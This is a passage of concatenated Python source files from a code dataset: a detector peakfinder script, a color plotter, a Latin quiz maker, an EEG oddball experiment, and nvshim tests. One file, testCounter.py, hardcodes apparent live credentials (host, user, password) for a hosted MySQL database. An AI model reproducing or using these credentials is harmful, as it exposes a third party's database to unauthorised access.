pbits=0)\nalg_equ.set_peak_selection_pars(npix_min=0, npix_max=1e6, amax_thr=0, atot_thr=0, son_min=10)\n#alg_equ.set_peak_selection_pars(npix_min=0, npix_max=1e6, amax_thr=0, atot_thr=500, son_min=6) # for v2r1\n\n\n\n#alg_equ.print_attributes()\n#alg_equ.print_input_pars()\n\n##-----------------------------\n\nxoffset, yoffset = 300, 
300\nxsize, ysize = 1150, 1150\n\n# Pixel image indexes\niX = np.array(det.indexes_x(evt), dtype=np.int64) #- xoffset\niY = np.array(det.indexes_y(evt), dtype=np.int64) #- yoffset\n\n# Protect indexes (should be POSITIVE after offset subtraction)\nimRow = np.select([iX=EVTMAX : break\n\n # get calibrated data ndarray and proccess it if it is available\n t1_sec = time()\n #nda = det.calib(evt)\n\n # Apply custom calibration: raw, -peds, -bkgd, *smask, -cmod\n nda_raw = det.raw(evt)\n\n if nda_raw is not None :\n\n nda = np.array(nda_raw, dtype=np.float32, copy=True)\n nda -= nda_peds\n nda = subtract_bkgd(nda, nda_bkgd, mask=nda_smask, winds=winds_bkgd, pbits=0)\n nda *= nda_smask\n det.common_mode_apply(evt, nda)\n\n #print ' ----> calibration dt = %f sec' % (time()-t1_sec)\n\n\n #print_arr_attr(nda, 'calibrated data')\n t0_sec = time()\n\n # run peakfinders and get list of peak records for each region\n #peaks_arc = alg_arc.peak_finder_v2r1(nda, thr=30, r0=7, dr=2)\n #peaks_arc = alg_arc.peak_finder_v3r1(nda, rank=5, r0=7, dr=2, nsigm=0) # 1.64 (5%)\n #peaks_arc = alg_arc.peak_finder_v4r1(nda, thr_low=10, thr_high=150, rank=5, r0=7, dr=2)\n peaks_arc = alg_arc.peak_finder_v4r2(nda, thr_low=10, thr_high=150, rank=5, r0=7, dr=2)\n\n #peaks_equ = alg_equ.peak_finder_v2r1(nda, thr=30, r0=7, dr=2)\n #peaks_equ = alg_equ.peak_finder_v3r1(nda, rank=5, r0=7, dr=2, nsigm=0) # 1.64 (5%)\n #peaks_equ = alg_equ.peak_finder_v4r1(nda, thr_low=10, thr_high=150, rank=5, r0=7, dr=2)\n peaks_equ = alg_equ.peak_finder_v4r2(nda, thr_low=10, thr_high=150, rank=5, r0=7, dr=2)\n \n # available after v2r1, v4r2\n #maps_of_conpix_arc = alg_arc.maps_of_connected_pixels()\n #maps_of_conpix_equ = alg_equ.maps_of_connected_pixels()\n\n # available after v3r1 ONLY!\n #maps_of_locmax_arc = alg_arc.maps_of_local_maximums()\n #maps_of_locmax_equ = alg_equ.maps_of_local_maximums()\n\n ###===================\n if do_print(i) : print('%s\\n%s\\n%s\\n%s' % (85*'_', pstore.header[0:66], pstore.rec_evtid(evt), addhdr))\n ###===================\n\n peak_reg_lists = list(zip(('ARC','EQU'), (peaks_arc, peaks_equ))) \n\n # loop over ARC and EQU regions\n for reg, peak_list in peak_reg_lists :\n\n # loop over peaks found in the region\n for peak in peak_list :\n\n # get peak parameters\n seg,row,col,npix,amax,atot,rcent,ccent,rsigma,csigma,\\\n rmin,rmax,cmin,cmax,bkgd,rms,son = peak[0:17]\n\n # get pixel coordinates\n imrow, imcol, xum, yum, rum, phi = geo_pars(seg, row, col)\n \n # make peak-record and save it in the file\n rec = fmt % (i, reg, seg, row, col, npix, amax, atot, rcent, ccent, rsigma, csigma,\\\n rmin, rmax, cmin, cmax, bkgd, rms, son,\\\n imrow, imcol, xum, yum, rum, phi)\n \n pstore.save_peak(evt, rec)\n\n ###===================\n if do_print(i) : print('%s' % rec)\n ###===================\n\n ###===================\n if do_print(i) : print('Event %d --- dt/evt = %f sec' % (i, time()-t0_sec))\n ###===================\n\n if DO_PLOT and i%EVTPLOT==0 :\n\n #nda = maps_of_conpix_arc \n #nda = maps_of_conpix_equ \n #nda = nda_bkgd\n #nda = nda_bkgd + regs_check \n #img = det.image(evt, nda)\n #img = det.image(evt, nda)[xoffset:xoffset+xsize,yoffset:yoffset+ysize]\n img = det.image(evt, mask_img*nda)[xoffset:xoffset+xsize,yoffset:yoffset+ysize]\n #img = det.image(evt, maps_of_conpix_equ)[xoffset:xoffset+xsize,yoffset:yoffset+ysize]\n ave, rms = img.mean(), img.std()\n amin, amax = ave-1*rms, ave+8*rms\n gg.plot_img(img, mode='do not hold', amin=amin, amax=amax)\n gg.plot_peaks_on_img(peaks_arc, axim, imRow, imCol, 
color='w') #, pbits=3)\n gg.plot_peaks_on_img(peaks_equ, axim, imRow, imCol, color='w') #, pbits=3)\n\n #gg.plotHistogram(nda, amp_range=(-100,100), bins=200, title='Event %d' % i)\n\n fig.canvas.set_window_title('Event: %d' % i) \n fig.canvas.draw() # re-draw figure content\n\n\nprint(' ----> Event loop time = %f sec' % (time()-t0_sec_evloop))\n\npstore.close_file()\n\n##-----------------------------\n\ngg.show() # hold image untill it is closed\n \n##-----------------------------\n\nsys.exit('Test is completed')\n\n##-----------------------------\n","sub_path":"examples/ex_peakfinder_cspad.py","file_name":"ex_peakfinder_cspad.py","file_ext":"py","file_size_in_byte":9656,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"420493737","text":"import pymysql\n\n\nconnection=pymysql.connect(\"mysql6001.site4now.net\", \"a2dc82_recipes\", \"conaobiad1\", \"db_a2dc82_recipes\")\ncursor=connection.cursor()\n\nid = 1\ntry:\n przepis = \"SELECT * FROM DINNER \"\n cursor = connection.cursor()\n cursor.execute(przepis)\n result = cursor.fetchall()\n one=result[0][0]\n print(one)\n\n\nexcept:\n connection.rollback()","sub_path":"testCounter.py","file_name":"testCounter.py","file_ext":"py","file_size_in_byte":350,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"285156947","text":"import tkinter\nimport colorsys\nimport math\n\n# Make the window large so that we can see more detail.\nCANVAS_WIDTH = 1000\nCANVAS_HEIGHT = 1000\nBIG_CIRCLE_RADIUS = 450\nDATA_FILE = 'small.txt'\nDOT_SIZE = 4\n\n\ndef main():\n # get a drawing canvas\n canvas = make_canvas(CANVAS_WIDTH, CANVAS_HEIGHT, 'XKCD Colors')\n\n dataset = load_data()\n while True:\n query = input('Color name: ')\n query = query.lower()\n if query == 'clear':\n canvas.delete(\"all\")\n elif query in dataset:\n colors = dataset[query]\n display_colors(canvas, colors)\n elif query == '':\n break\n canvas.update()\n\n\ndef display_colors(canvas, color_list):\n for color in color_list:\n r = color[0]\n g = color[1]\n b = color[2]\n plot_color(canvas, r, g, b)\n\n\ndef plot_color(canvas, r, g, b):\n hsv = colorsys.rgb_to_hsv(r / 256, g / 256, b / 256)\n\n radius = BIG_CIRCLE_RADIUS * hsv[1]\n\n theta = hsv[0] * math.pi * 2.0\n\n x = CANVAS_WIDTH / 2.0 + radius * math.cos(theta)\n y = CANVAS_HEIGHT / 2.0 - radius * math.sin(theta)\n\n color_str = colorstr_from_rgb(r, g, b)\n plot_pixel(canvas, x, y, color_str)\n\n\ndef plot_pixel(canvas, x, y, color_str):\n # Create a 1x1 rectangle\n canvas.create_oval(x, y, x+DOT_SIZE, y+DOT_SIZE,\n fill=color_str, outline=color_str)\n\n\ndef load_data():\n data = {}\n file = open(DATA_FILE)\n n_colors = 0\n for line in file:\n line = line.strip()\n add_color(data, line)\n n_colors += 1\n # print(len(data), n_colors)\n file.close()\n return data\n\n\ndef add_color(data, line):\n parts = line.split(',')\n color_name = parts[0]\n color_rgb = color_from_line(line)\n if color_name not in data:\n data[color_name] = []\n data[color_name].append(color_rgb)\n\n\ndef color_from_line(line):\n parts = line.split(',')\n r = int(parts[1])\n g = int(parts[2])\n b = int(parts[3])\n return [r, g, b]\n\n\ndef colorstr_from_rgb(red, green, blue):\n assert 0 <= red <= 256\n assert 0 <= green <= 256\n assert 0 <= blue <= 256\n return \"#%02x%02x%02x\" % (red, green, blue)\n\n######## DO NOT MODIFY ANY CODE BELOW THIS LINE ###########\n\n# This function is provided to you and should not be modified.\n# It creates a window that contains a drawing canvas that you\n# will use to make your drawings.\n\n\ndef make_canvas(width, height, title=None):\n \"\"\"\n DO NOT MODIFY\n Creates and returns a drawing canvas\n ready for drawing.\n \"\"\"\n top = tkinter.Tk()\n top.minsize(width=width, height=height)\n if title:\n top.title(title)\n canvas = tkinter.Canvas(top, width=width + 1, height=height + 1)\n canvas.pack()\n return canvas\n\n\nif __name__ == '__main__':\n main()","sub_path":"xkcd.py","file_name":"xkcd.py","file_ext":"py","file_size_in_byte":2779,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"268060159","text":"from random import randint\r\n\"\"\"\r\nThis class is responsible for sorting through a list of problems and making a dictionary of the questions and answers.\r\n\"\"\"\r\nclass QuestionMaker:\r\n\r\n def sort(self, path, delineater):\r\n \"\"\"\r\n The DataSorter class takes a file path, which tells it where to open the file containing a list of\r\n problems/questions as well as a delineater to tell it where the line between questions and answers should be drawn.\r\n \"\"\"\r\n questionDict = {}\r\n file = open(path, \"r\")\r\n for line in file:\r\n tempList = line.split(delineater, 1)\r\n if (\"\\n\" in tempList[1]):\r\n tempList[1] = tempList[1].replace(\"\\n\", '', 1)\r\n questionDict[tempList[0]] = tempList[1]\r\n return questionDict\r\n\r\n def createQuestions(self, questionDict):\r\n \"\"\"\r\n This method takes a dictionary of questions and answers and turns it into a multiple choice quiz\r\n \"\"\"\r\n questList = [\"\"] * 5\r\n for x in range(0, 5):\r\n quizNumb = randint(0, len(questionDict))\r\n vocabWord = str(list(questionDict.items())[quizNumb][0])\r\n formattedVocabWord = self.formatString(vocabWord)\r\n question = str(x + 1) + \". What does the Latin word \" \\\r\n + formattedVocabWord + \" mean?\" + '\\n'\r\n answerNum = randint(0, 3)\r\n for y in range(0, 4):\r\n if y is answerNum:\r\n answer = str(y + 1) + \". \" \\\r\n + self.formatString(str(questionDict.get(vocabWord))) + '\\n'\r\n else:\r\n randomAnswer = list(questionDict.values())[randint(0, len(questionDict))]\r\n answer = str(y + 1) + \". \" + self.formatString(str(randomAnswer)) + '\\n'\r\n\r\n question += answer\r\n\r\n questList[x] = question\r\n return questList\r\n\r\n def formatString(self, string):\r\n formatedString = string.replace('\\n', \"\")\r\n length = len(formatedString) - 1\r\n while formatedString[0] == \" \":\r\n formatedString = formatedString[1:length]\r\n length -= 1\r\n length = len(formatedString) - 1\r\n while formatedString[length] == \" \":\r\n formatedString = formatedString[0:length]\r\n length =- 1\r\n return formatedString\r\n\r\npath = \"LatinWords.txt\"\r\nquiz = QuestionMaker()\r\nquizQuestions = quiz.sort(path, \":\")\r\nlatinQuestions = quiz.createQuestions(quizQuestions)\r\nfor string in latinQuestions:\r\n print(string)","sub_path":"QuestionMaker.py","file_name":"QuestionMaker.py","file_ext":"py","file_size_in_byte":2557,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"533048548","text":"import time\nimport os\nimport sys\nimport random\nimport datetime\nimport numpy\nimport pygame\nfrom pylsl import StreamInfo, StreamOutlet, local_clock\n\n###FIRST DEFINE OUR PARTICIPANT NUMBER###\n##part_num = '003'\n##except_list = ['001']\n##except_list.append(part_num)\n\ntext_file = open(\"/home/pi/Experiments/Familiarity_Oddball/Parts\",\"r\")\nexcept_list = text_file.read().split(',')\npart_num = except_list[0]\n##with open('/home/pi/Experiments/Familiarity_Oddball/Participant_Number','r') as myfile:\n##\tpart_num = myfile.read().replace('\\n','')\n##part_num= str(numpy.genfromtxt('/home/pi/Experiments/Familiarity_Oddball/Participant_Number', dtype='str'))\n##except_list = str(numpy.genfromtxt('/home/pi/Experiments/Familiarity_Oddball/Exclude', dtype='str'))\n##part_num = except_list[1:6]\n#part_num= str(numpy.genfromtxt('/home/pi/Experiments/Familiarity_Oddball/Participant_Number', dtype='str'))\n\n###setup variable related to pic and trial number here###\nlow_rate = 0.8\nhigh_rate = 0.2\n\ntotal_parts = 6\nself_count = 5\nfam_count = 5\nplace_count = 10\ntrials = (self_count + fam_count + place_count)*total_parts\n\n###create our stream variables###\ninfo = StreamInfo('Markers', 'Markers', 1, 0, 'int32', 'myuidw43536')\n\n###next make an outlet to record the streamed data###\noutlet = StreamOutlet(info)\n\n###setup GPIO pins and initialise pygame###\npygame.mixer.pre_init(44100,-16,2,512)\npygame.init()\npygame.display.init()\npygame.mixer.init()\n\n###setup the display screen and fixation###\npygame.mouse.set_visible(0)\ndisp_info = pygame.display.Info()\nscreen = pygame.display.set_mode((disp_info.current_w, disp_info.current_h),pygame.FULLSCREEN)\nx_center = disp_info.current_w/2\ny_center = disp_info.current_h/2\nblack = pygame.Color(0, 0, 0)\nwhite = pygame.Color(255,255,255)\n\n###so, we need 2 master lists\n###one that tells us if the current trial will be a standard or target\n###another that will tell use if we need to show a self, family, or place image\n\n###first we determine how many of each image we need\nself_images = (numpy.zeros((2,total_parts*self_count)))+1\nfam_images = (numpy.zeros((2,total_parts*fam_count)))+2\nplace_images = (numpy.zeros((2,total_parts*place_count)))+3\n\n###now loop through and define our targets and standards###\n\nfor i_img in range(total_parts*self_count):\n if i_img < ((total_parts*self_count)*low_rate):\n self_images[1][i_img] = 1\n elif i_img >= ((total_parts*self_count)*low_rate):\n self_images[1][i_img] = 2\n\nfor i_img in range(total_parts*fam_count):\n if i_img < ((total_parts*fam_count)*low_rate):\n fam_images[1][i_img] = 1\n elif i_img >= ((total_parts*fam_count)*low_rate):\n fam_images[1][i_img] = 2\n\nfor i_img in range(total_parts*10):\n if i_img < ((total_parts*10)*low_rate):\n place_images[1][i_img] = 1\n elif i_img >= ((total_parts*10)*low_rate):\n place_images[1][i_img] = 2\n\n###here we will combine our three matrices### \nimage_order = numpy.concatenate((self_images,fam_images,place_images),axis = 1)\n\n###convert them to a list, pair each of the elements, and then shuffle the order###\nimage_order = list(zip(image_order[0],image_order[1]))\nrandom.shuffle(image_order)\nimage_order, trial_order = zip(*image_order)\n\n###define when we will have breaks###\nbreak1 = int(trials*0.25)\nbreak2 = int(trials*0.5)\nbreak3 = int(trials*0.75)\nbreak4 = int(trials*0.75)\nbreak5 = int(trials*0.75)\n\n###setup variables to record times###\ntrig_time = []\ndelay_length = []\npart_list = []\nimage_list 
= []\nimage_type = []\n#trig_time = [\"\" for x in range(trials)]\n#delay_length = [\"\" for x in range(trials)]\n#part_list = [\"\" for x in range(trials)]\n#image_list = [\"\" for x in range(trials)]\n#image_type = [\"\" for x in range(trials)]\n\n###setup our instruction screens###\npygame.font.init()\nmyfont = pygame.font.SysFont('Times New Roman', 20)\ninstructions_1 = myfont.render('Focus on the central fixation during the task.', True, white)\ninstructions_2 = myfont.render('Press the spacebar when you see your pictures, do not press the spacebar when you see other pictures.', True, white)\ninstructions_3 = myfont.render('Press the spacebar when you are ready to begin.', True, white)\nbreak_screen_1 = myfont.render('Feel free to take a break at this time.', True, white)\nbreak_screen_2 = myfont.render('Press the spacebar when you are ready to continue.', True, white)\ndone_1 = myfont.render('Great! You have finished the experiment!', True, white)\ndone_2 = myfont.render('Please let the experimenter know you have finished.', True, white)\ndone_3 = myfont.render('Press the spacebar to exit.', True, white)\n\n###show our instructions, and wait for a response###\nscreen.blit(instructions_1,(x_center-((instructions_1.get_rect().width)/2),y_center + ((instructions_1.get_rect().height)*1)+10))\nscreen.blit(instructions_2,(x_center-((instructions_2.get_rect().width)/2),y_center + ((instructions_2.get_rect().height)*2)+10))\nscreen.blit(instructions_3,(x_center-((instructions_3.get_rect().width)/2),y_center + ((instructions_3.get_rect().height)*3)+10))\npygame.display.flip()\ntime.sleep(1)\nkey_pressed = 0\npygame.event.clear()\nwhile key_pressed == 0:\n event = pygame.event.wait()\n if event.type == pygame.QUIT:\n pygame.quit()\n sys.exit()\n elif event.type == pygame.KEYDOWN:\n if event.key == pygame.K_SPACE:\n key_pressed = 1\n\nscreen.fill(pygame.Color(\"black\")) \npygame.draw.line(screen, (255, 255, 255), (x_center-10, y_center), (x_center+10, y_center),4)\npygame.draw.line(screen, (255, 255, 255), (x_center, y_center-10), (x_center, y_center+10),4)\npygame.display.flip()\ntime.sleep(1)\n\n###wait for button press to start experiment###\nvid_start = time.time()\ntimestamp = local_clock()\ntime.sleep(1)\noutlet.push_sample([3], timestamp)\n\nfor i_pic in range(trials):\n if i_pic in (break1, break2, break3, break4 ,break5):\n ###show the break screen, and wait for a response###\n screen.fill(pygame.Color(\"black\")) \n screen.blit(break_screen_1,(x_center-((break_screen_1.get_rect().width)/2),y_center + ((break_screen_1.get_rect().height)*1)+10))\n screen.blit(break_screen_2,(x_center-((break_screen_2.get_rect().width)/2),y_center + ((break_screen_2.get_rect().height)*2)+10))\n pygame.display.flip()\n time.sleep(1)\n key_pressed = 0\n pygame.event.clear()\n while key_pressed == 0:\n event = pygame.event.wait()\n if event.type == pygame.QUIT:\n pygame.quit()\n sys.exit()\n elif event.type == pygame.KEYDOWN:\n if event.key == pygame.K_SPACE:\n key_pressed = 1\n screen.fill(pygame.Color(\"black\")) \n pygame.draw.line(screen, (255, 255, 255), (x_center-10, y_center), (x_center+10, y_center),4)\n pygame.draw.line(screen, (255, 255, 255), (x_center, y_center-10), (x_center, y_center+10),4)\n pygame.display.flip()\n time.sleep(1)\n else:\n ###wait for a random amount of time between images###\n delay = ((random.randint(0,500))*0.001)+1.00\n delay_length.append(delay)\n ###determine if the trial is a standrad or target###\n ###trial is a target###\n if trial_order[i_pic] == 2:\n ###change 
current part number to a string of the appropriate format###\n if int(part_num) > 9:\n part_order_temp = '0' + str(int(part_num))\n else:\n part_order_temp = '00' + str(int(part_num))\n\n ###now define our trigger to send with LSL###\n trigger = 2\n ###trial is a standard###\n elif trial_order[i_pic] == 1:\n ###pick a random number between 1 and our total number of participants###\n part_order_temp = random.randint(1,total_parts)\n \n ###change part num to an appropriate format###\n if part_order_temp > 9:\n part_order_temp = '0' + str(int(part_order_temp))\n else:\n part_order_temp = '00' + str(int(part_order_temp))\n ###since standards are images from other parts, make sure we are not using the current part number###\n while part_order_temp in except_list:\n part_order_temp = random.randint(1,total_parts)\n ###change part num to an appropriate format###\n if part_order_temp > 9:\n part_order_temp = '0' + str(int(part_order_temp))\n else:\n part_order_temp = '00' + str(int(part_order_temp))\n\n ###now define our trigger to send with LSL###\n trigger = 1\n ###now determine the type of image, and image number, we are showing###\n if image_order[i_pic] == 1:\n pic_order_temp = random.randint(1,self_count)\n elif image_order[i_pic] == 2:\n pic_order_temp = random.randint(1,fam_count)\n elif image_order[i_pic] == 3:\n pic_order_temp = random.randint(1,place_count)\n\n ###change part num to an appropriate format###\n if pic_order_temp > 9:\n pic_order_temp = str(int(pic_order_temp))\n else:\n pic_order_temp = '0' + str(int(pic_order_temp))\n\n ###now check to see what image type we will show###\n if image_order[i_pic] == 1:\n if os.path.exists('/home/pi/Experiments/Familiarity_Oddball/Images/' + part_order_temp + '_SFSS_' + pic_order_temp + '.jpg'):\n image_order_temp = 'SFSS'\n else:\n image_order_temp = 'SFBB'\n elif image_order[i_pic] == 2:\n if os.path.exists('/home/pi/Experiments/Familiarity_Oddball/Images/' + part_order_temp + '_FFSS_' + pic_order_temp + '.jpg'):\n image_order_temp = 'FFSS'\n else:\n image_order_temp = 'FFBB'\n elif image_order[i_pic] == 3:\n image_order_temp = 'P'\n\n ###record our part and image numbers###\n part_list.append(part_order_temp)\n image_list.append(pic_order_temp)\n image_type.append(image_order_temp)\n trial_img = pygame.image.load('/home/pi/Experiments/Familiarity_Oddball/Images/' + part_order_temp + '_' + image_order_temp + '_' + pic_order_temp + '.jpg')\n print('/home/pi/Experiments/Familiarity_Oddball/Images/' + part_order_temp + '_' + image_order_temp + '_' + pic_order_temp + '.jpg')\n ###send triggers###\n timestamp = local_clock()\n outlet.push_sample([trigger], timestamp)\n trig_time.append(time.time() - vid_start) \n ###present image###\n screen.fill(pygame.Color(\"black\")) \n screen.blit(trial_img,((x_center-(trial_img.get_width()/2)),(y_center-(trial_img.get_height()/2))))\n pygame.display.flip()\n time.sleep(1.5)\n screen.fill(pygame.Color(\"black\")) \n pygame.draw.line(screen, (255, 255, 255), (x_center-10, y_center), (x_center+10, y_center),4)\n pygame.draw.line(screen, (255, 255, 255), (x_center, y_center-10), (x_center, y_center+10),4)\n pygame.display.flip()\n ###wait for a random amount of time and set the trigger back to zero###\n time.sleep(delay)\n\ntime.sleep(5)\nos.remove(\"/home/pi/Experiments/Familiarity_Oddball/Stop_EEG.csv\")\nfilename = \"%s_all_familiarity_p3_trigs_muse\"%(part_num)\nfilename_part = 
(\"/home/pi/Experiments/Familiarity_Oddball/Data/LSL/Muse/Muse_Recorded_Trig_Info/%s.csv\")%filename\nnumpy.savetxt(filename_part, (part_list,image_list,image_type,image_order,trial_order,trig_time,delay_length), delimiter=',',fmt=\"%s\") \n\nscreen.fill(pygame.Color(\"black\")) \nscreen.blit(done_1,(x_center-((done_1.get_rect().width)/2),y_center + ((done_1.get_rect().height)*1)+10))\nscreen.blit(done_2,(x_center-((done_2.get_rect().width)/2),y_center + ((done_2.get_rect().height)*2)+10))\nscreen.blit(done_3,(x_center-((done_3.get_rect().width)/2),y_center + ((done_3.get_rect().height)*3)+10))\npygame.display.flip()\nkey_pressed = 0\npygame.event.clear()\nwhile key_pressed == 0:\n event = pygame.event.wait()\n if event.type == pygame.QUIT:\n pygame.quit()\n sys.exit()\n elif event.type == pygame.KEYDOWN:\n if event.key == pygame.K_SPACE:\n key_pressed = 1\n \ntime.sleep(5)\n\npygame.mouse.set_visible(0)\npygame.display.quit()\npygame.quit() \nsys.exit()\n","sub_path":"Familiarity_Oddball/LSL/old/familiarity_p3_muse_lsl_copy3.py","file_name":"familiarity_p3_muse_lsl_copy3.py","file_ext":"py","file_size_in_byte":12329,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"626661798","text":"\"\"\"\n\n json.dumps:\n 存储\n 将 Python 对象编码成 JSON 字符串(str对象)\n\n\"\"\"\n\nimport json\n\ndata = [{\"name\": \"yhz\", \"lang\": (\"python\", \"english\"), \"age\": 40}] # \ndata_j = json.dumps(data, sort_keys=True, indent=2) # \n\nprint(data_j)\n\n# sort_keys=True 意思是按照键的字典顺序排序\n# indent=2 是让每个键值对显示的时候,以缩进两个字符对齐,效果好看\n","sub_path":"A_库的分类/Json_yhz/1、dumps.py","file_name":"1、dumps.py","file_ext":"py","file_size_in_byte":459,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"491110669","text":"\"\"\"Test main shim logic\"\"\"\nimport os\nimport subprocess\nimport sys\nfrom pathlib import Path\n\nimport pytest\nimport semver\n\nfrom nvshim.core.__main__ import (\n HashableDict,\n HashableList,\n get_files,\n get_nvm_aliases,\n get_nvm_stable_version,\n get_nvmrc,\n main,\n match_version,\n parse_args,\n parse_version,\n resolve_alias,\n run_nvm_cmd,\n)\nfrom nvshim.utils.environment import (\n EnvironmentVariable,\n process_env,\n)\nfrom nvshim.utils.process import clean_output\n\n\ndef test_raises_missing_bin_file():\n \"\"\"Test parsing of no arguments provided\"\"\"\n with pytest.raises(SystemExit):\n parse_args([])\n\n\ndef test_accepts_bin_file_arg(snapshot):\n \"\"\"Test parsing accept the bin file to be called\"\"\"\n snapshot.assert_match(parse_args([\"node\"]))\n\n\ndef test_accepts_any_arg_for_bin_file(snapshot):\n \"\"\"Test parsing accepts the bin file and arguments to be called with\"\"\"\n snapshot.assert_match(parse_args([\"npm\", \"--version\", \"--help\"]))\n\n\ndef test_fails_when_nvm_dir_not_available(capsys, snapshot, test_args):\n \"\"\"Test main logic that when nvm dir is not available appropriate error is raised\"\"\"\n with process_env({EnvironmentVariable.VERBOSE.value: \"true\"}), pytest.raises(\n SystemExit\n ) as exc_info:\n main()\n\n captured = capsys.readouterr()\n snapshot.assert_match(clean_output(captured.out))\n assert not captured.err\n assert exc_info.value.code == 1003\n\n\ndef test_fails_when_version_not_installed(\n mocker,\n capsys,\n snapshot,\n test_args,\n test_nested_workspace_with_nvmrc,\n test_node_version_dir,\n):\n \"\"\"Test main logic that when nvm dir is not available appropriate error is raised\"\"\"\n nvm_dir, _ = test_node_version_dir\n mocker.patch(\n \"nvshim.core.__main__.os.getcwd\",\n autospec=True,\n return_value=test_nested_workspace_with_nvmrc,\n )\n mock_env = {\n EnvironmentVariable.NVM_DIR.value: nvm_dir,\n **os.environ,\n EnvironmentVariable.VERBOSE.value: \"true\",\n EnvironmentVariable.AUTO_INSTALL.value: \"false\",\n }\n with process_env(mock_env), pytest.raises(SystemExit) as exc_info:\n main()\n\n captured = capsys.readouterr()\n snapshot.assert_match(clean_output(captured.out))\n assert not captured.err\n assert exc_info.value.code == 1001\n\n\ndef test_fails_when_node_binary_not_found_in_install_path(\n mocker,\n capsys,\n test_args,\n test_workspace_with_nvmrc,\n test_node_version_dir,\n):\n \"\"\"Test main logic checks nvm install node binary exists before execution\"\"\"\n nvm_dir, node_version_dir = test_node_version_dir\n mocker.patch(\n \"nvshim.core.__main__.os.getcwd\",\n autospec=True,\n return_value=test_workspace_with_nvmrc,\n )\n expected_node_bin_path = f\"{node_version_dir}/bin/{test_args[1]}\"\n\n mocker.patch(\n \"nvshim.core.__main__.os.path.exists\",\n side_effect=lambda path: Path(path).exists()\n if path != expected_node_bin_path\n else False,\n )\n mock_env = {\n EnvironmentVariable.NVM_DIR.value: nvm_dir,\n **os.environ,\n EnvironmentVariable.VERBOSE.value: \"true\",\n EnvironmentVariable.AUTO_INSTALL.value: \"true\",\n }\n with process_env(mock_env), pytest.raises(SystemExit) as exc_info:\n main()\n\n captured = capsys.readouterr()\n assert \"No executable file found at\" in clean_output(captured.out)\n assert exc_info.value.code == 1002\n\n\ndef test_runs_correct_version_of_node(\n mocker,\n capsys,\n test_args,\n test_nested_workspace_with_nvmrc,\n test_node_version_dir,\n):\n \"\"\"Test main logic that correct version of node is used from .nvmrc 
file\"\"\"\n nvm_dir, node_version_dir = test_node_version_dir\n mocker.patch(\n \"nvshim.core.__main__.os.getcwd\",\n autospec=True,\n return_value=test_nested_workspace_with_nvmrc,\n )\n mocked_process_run = mocker.patch(\n \"nvshim.utils.process.subprocess.run\", wraps=subprocess.run\n )\n mock_env = {\n EnvironmentVariable.NVM_DIR.value: nvm_dir,\n **os.environ,\n EnvironmentVariable.VERBOSE.value: \"true\",\n EnvironmentVariable.AUTO_INSTALL.value: \"true\",\n }\n with process_env(mock_env):\n main()\n\n mocked_process_run.assert_called_with(\n (f\"{node_version_dir}/bin/{test_args[1]}\", *test_args[2:]),\n check=True,\n encoding=\"UTF-8\",\n )\n captured = capsys.readouterr()\n assert \"with version \" in clean_output(captured.out)\n assert not captured.err\n\n\ndef test_get_files_returns_path_when_single_file(test_workspace_with_nvmrc):\n \"\"\"Test get files when called for non directory\"\"\"\n file_path = f\"{test_workspace_with_nvmrc}/.nvmrc\"\n result = [*get_files(file_path)]\n assert result == [file_path]\n\n\ndef test_run_nvm_command_handles_failure_to_remove_tmp_file(capsys, mocker, snapshot):\n \"\"\"Test handling of os remove file error\"\"\"\n mocked_process_run = mocker.patch(\n \"nvshim.core.__main__.process.run\",\n autospec=True,\n )\n mocker.patch(\n \"nvshim.core.__main__.os.remove\",\n autospec=True,\n side_effect=OSError,\n )\n run_nvm_cmd(\"/home/.nvm/.nvm.sh\", \"list\")\n mocked_process_run.assert_called_with(\n \"bash\", f\"{os.path.dirname(sys.argv[0])}/nvm_shim.sh.tmp\"\n )\n captured = capsys.readouterr()\n assert snapshot == clean_output(captured.out)\n\n\ndef test_get_nvm_stable_version_returns_nothing_when_no_version_found(\n capsys, mocker, snapshot\n):\n \"\"\"Test failure handling of fetching stable version from nvm\"\"\"\n mocked_process_run = mocker.patch(\n \"nvshim.core.__main__.process.run\",\n autospec=True,\n return_value=subprocess.CompletedProcess(None, 1),\n )\n assert get_nvm_stable_version(\"/home/.nvm\") is None\n mocked_process_run.assert_called_with(\n \"bash\",\n f\"{os.path.dirname(sys.argv[0])}/nvm_shim.sh.tmp\",\n stdout=subprocess.PIPE,\n )\n captured = capsys.readouterr()\n assert snapshot == clean_output(captured.out)\n\n\ndef test_get_nvm_stable_version_returns_correctly_when_no_version_found(mocker):\n \"\"\"Test correct handling of fetching alias version from nvm\"\"\"\n test_nvm_dir = \"/home/.nvm\"\n expected_version = \"17.8.0\"\n mocked_run_nvm_cmd = mocker.patch(\n \"nvshim.core.__main__.run_nvm_cmd\",\n autospec=True,\n return_value=subprocess.CompletedProcess(\n None, 0, f\"stable -> 17.8 (-> v{expected_version}) (default)\\n\"\n ),\n )\n assert get_nvm_aliases(test_nvm_dir) == {\n \"default\": \"stable\",\n \"stable\": expected_version,\n }\n mocked_run_nvm_cmd.assert_called_with(\n f\"{test_nvm_dir}/nvm.sh\", \"alias --no-colors\", stdout=subprocess.PIPE\n )\n\n\ndef test_parse_version_handles_none_case():\n \"\"\"Test parse version handles when version given is None\"\"\"\n assert parse_version(None) is None\n\n\ndef test_get_nvmrc_uses_raw_value_when_not_parseable(test_workspace):\n \"\"\"Test get nvmrc uses value in rc version when not parseable\"\"\"\n nvmrc_path = f\"{test_workspace}/.nvmrc\"\n non_parseable_version = \"D902\"\n with open(nvmrc_path, \"w\", encoding=\"UTF-8\") as open_file:\n open_file.write(non_parseable_version)\n assert get_nvmrc(nvmrc_path) == non_parseable_version\n\n\ndef test_resolve_alias_handles_cycles():\n \"\"\"Test that resolving aliases can handle recursive references\"\"\"\n 
